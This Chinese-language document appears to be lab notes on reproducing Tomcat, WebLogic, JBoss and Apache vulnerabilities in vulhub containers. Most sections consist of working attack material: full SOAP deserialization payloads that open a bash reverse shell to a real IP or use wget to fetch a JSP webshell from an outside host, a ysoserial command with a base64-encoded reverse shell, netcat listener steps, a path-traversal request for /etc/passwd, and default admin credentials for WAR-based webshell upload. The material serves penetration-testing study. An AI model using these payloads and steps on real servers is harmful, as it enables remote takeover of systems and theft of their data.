Tomcat
CVE-2017-12615
Tomcat put方法任意文件写入漏洞
漏洞描述
当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly初始化参数由默认值设置为false),攻击者将有可能通过构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限
环境搭建
cd vulhub-master/tomcat/CVE-2017-12615
docker-compose up -d
漏洞复现
http://124.221.58.83:8081
首页抓包,改为put提交(Tomcat允许适用put方法上传任意文件类型,但不允许jsp后缀文件上传,因此我们需要配合 windows的解析漏洞)
http://124.221.58.83:8081/shell.jsp
使用Webshell客户端工具进行连接
后台弱口令部署war包
漏洞原理
在tomcat8环境下默认进入后台的密码为 tomcat/tomcat ,未修改造成未授权即可进入后台,或者管理员把密码设置成弱口令
环境搭建
cd vulhub-master/tomcat/tomcat8
docker-compose up -d
漏洞复现
http://124.221.58.83:8080/manager/html
默认密码:tomcat/tomcat
制作WAR包
制作WAR包,将JSP木马压缩为ZIP格式,然后修改后缀为war就可以了
文件上传成功后,默认会在网站根目录下生成和war包名称⼀致得目录,然后目录中得木马就是压缩前的文件名
http://124.221.58.83:8602/shell/shell.jsp
CVE-2020-1938
Tomcat⽂件包含漏洞
漏洞原理
由于Tomcat AJP协议设计上的缺陷,攻击者通过Tomcat AJP Connector 可以读取或包含Tomcat上所有Webapp⽬录下的任意⽂件,例如:可以读取webapp配置⽂件或源码⽂件。此外如果⽬标应⽤有⽂件上传的功能情况下,配合为⽂件包含漏洞利⽤GetShell
环境搭建
cd vulhub-master/tomcat/CVE-2020-1938
docker-compose up -d
漏洞复现
tomcat默认的conf/server.xml中配置了2个Connector,⼀个为 8080 的对外提供的HTTP协议端⼝,另外⼀个就是默认的 8009 AJP协议端⼝,两个端⼝默认均监听在外⽹ip
POC:
python cve-2020-1938.py -p 8009 -f /WEB-INF/web.xml 124.221.58.83
WebLogic
后台弱口令GetShell
漏洞描述
通过弱口令进入后台界面 , 上传部署war包 , getshell
环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
漏洞复现
默认账号密码:weblogic/Oracle@123
weblogic常用弱口令:https://cirt.net/passwords?criteria=weblogic
单个账号错误密码5次之后就会自动锁定
124.221.58.83:7001/console/login/LoginForm.jsp
登录后台后,点击部署,点击安装,点击上传文件。
weblogic Oracle@123
上传war包,jsp木马压缩成zip,修改后缀为war,上传
然后⼀直下一步
124.221.58.83:7001/shell/shell.jsp
CVE-2017-3506
漏洞描述
Weblogic的WLS Security组件对外提供了webserver服务,其中使⽤了XMLDecoder来解析⽤户输⼊的XML数据,在解析过程中出现反序列化漏洞,可导致任意命令执⾏
环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
漏洞复现
访问以下⽬录中的⼀种,有回显如下图可以判断wls-wsat组件存在
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
访问
http://124.221.58.83:7001/wls-wsat/CoordinatorPortType
在当前页面抓包之后,添加下面请求包,反弹shell
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 124.221.58.83:8604 Accept-Encoding: gzip, deflate
Accept: */* Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close
Content-Type: text/xml
Content-Length: 638 <soapenv:Envelope xmlns:soapenv=
"http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work=
"http://bea.com/2004/06/soap/workarea/">
<java version=
"1.8.0_131" class=
"java.beans.XMLDecoder">
<object class=
"java.lang.ProcessBuilder">
<array class=
"java.lang.String" length=
"3">
<void index=
"0">
<string>/bin/bash</string>
</void>
<void index=
"1">
<string>-c</string>
</void>
<void index=
"2">
<string>bash -i >& /dev/tcp/124.221.58.83/6666 0>&1</string>
</void>
</array>
<void method=
"start"/></object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/> </soapenv:Envelope>
CVE-2019-2725
漏洞描述
wls9-async等组件为WebLogic Server提供异步通讯服务,默认应⽤于WebLogic部分版本。由于该
WAR包在反序列化处理输⼊信息时存在缺陷,攻击者通过发送精⼼构造的恶意 HTTP 请求,即可获得⽬标服务器的权限,在未授权的情况下远程执⾏命令
环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
漏洞复现
漏洞验证
http://124.221.58.83:7001/_async/AsyncResponseService
如果出现以下页面,则说明存在漏洞
在当前页面抓包 , 修改请求包 , 写入shell
POST /_async/AsyncResponseService HTTP/1.1
Host: 124.221.58.83:7001 Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,
*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 839 Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */* User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv=
"http://schemas.xmlsoap.org/soap/envelope/"
xmlns:wsa=
"
http://www.w3.org/2005/08/addressing"
xmlns:asy=
"http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work=
"http://bea.com/2004/06/soap/workarea/">
<void class=
"java.lang.ProcessBuilder">
<array class=
"java.lang.String" length=
"3">
<void index=
"0">
<string>/bin/bash</string>
</void>
<void index=
"1">
<string>-c</string>
</void>
<void index=
"2">
<string>wget http://114.132.92.17/2.txt -O
servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method=
"start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/> </soapenv:Body></soapenv:Envelope>
访问下载到weblogic服务器上的木马
http://124.221.58.83:7001/bea_wls_internal/678.jsp
Jboss
CVE-2015-7501
漏洞介绍
这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了⽤户传⼊的对象,然后我们利⽤Apache Commons Collections中的 Gadget 执⾏任意代码
环境搭建
cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d
漏洞复现
http://121.40.229.129:8080/
POC,访问地址
http://121.40.229.129:8080/invoker/JMXInvokerServlet
返回如下,说明接⼝开放,此接⼝存在反序列化漏洞
下载 ysoserial ⼯具进⾏漏洞利⽤
https://github.com/frohoff/ysoserial
将反弹shell进⾏base64编码
bash -i >& /dev/tcp/114.132.92.17/6666 0>&1
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=java8 -jar ysoserial-all.jar CommonsCollections5 "bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTQuMTMyLjkyLjE3LzY2NjYgMD4mMSA=}|{base64,-d}|
{bash,-i} ">exp.ser
服务器设置监听端⼝
nc -lvvp 6666
curl http://121.40.229.129:8080/invoker/JMXInvokerServlet --data-binary @exp.ser
CVE-2017-7504
漏洞介绍
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java⽂件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利⽤该漏洞执⾏任意代码执⾏
环境搭建
cd vulhub-master/jboss/CVE-2017-7504
docker-compose up -d
漏洞复现
http://121.40.229.129:8080/jbossmq-httpil/HTTPServerILServlet
python3 jexboss.py -u http://121.40.229.129:8080
CVE-2017-12149
漏洞简述
该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中。该过滤器在没有进⾏任何安全检查的情况下尝试将来⾃客户端的数据流进⾏反序列化,从⽽导致了漏洞
环境搭建
cd vulhub-master/jboss/CVE-2017-12149
docker-compose up -d
漏洞复现
http://121.40.229.129:8080/
验证是否存在漏洞 , 访问
http://121.40.229.129:8080/invoker/readonly
该漏洞出现在/invoker/readonly中 ,服务器将⽤户post请求内容进⾏反序列化
返回500,说明此页面存在反序列化漏洞
使用工具进行检测 DeserializeExploit 如果成功直接上传webshell即可:工具:
https://cdn.vulhub.org/deserialization/DeserializeExploit.jar
也可以直接执行命令:https://github.com/yunxu1/jboss-_CVE-2017-12149
Apache
CVE-2021-41773
漏洞简介
该漏洞是由于Apache HTTP Server 2.4.49版本存在⽬录穿越漏洞,在路径穿越⽬录 <Directory/>Require all granted</Directory>允许被访问的的情况下(默认开启),攻击者可利⽤该路径穿越漏洞读取到Web⽬录之外的其他⽂件,在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执⾏任意cgi命令(RCE)
环境搭建
docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
漏洞复现
http://121.40.229.129:8080/
使用poc
curl http://121.40.229.129:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
⼯具验证
在服务端开启了gi或cgid这两个mod的情况下,这个路径穿越漏洞将可以执行任意cg命令
参考:https://blog.csdn.net/weixin_44769042/article/details/120978656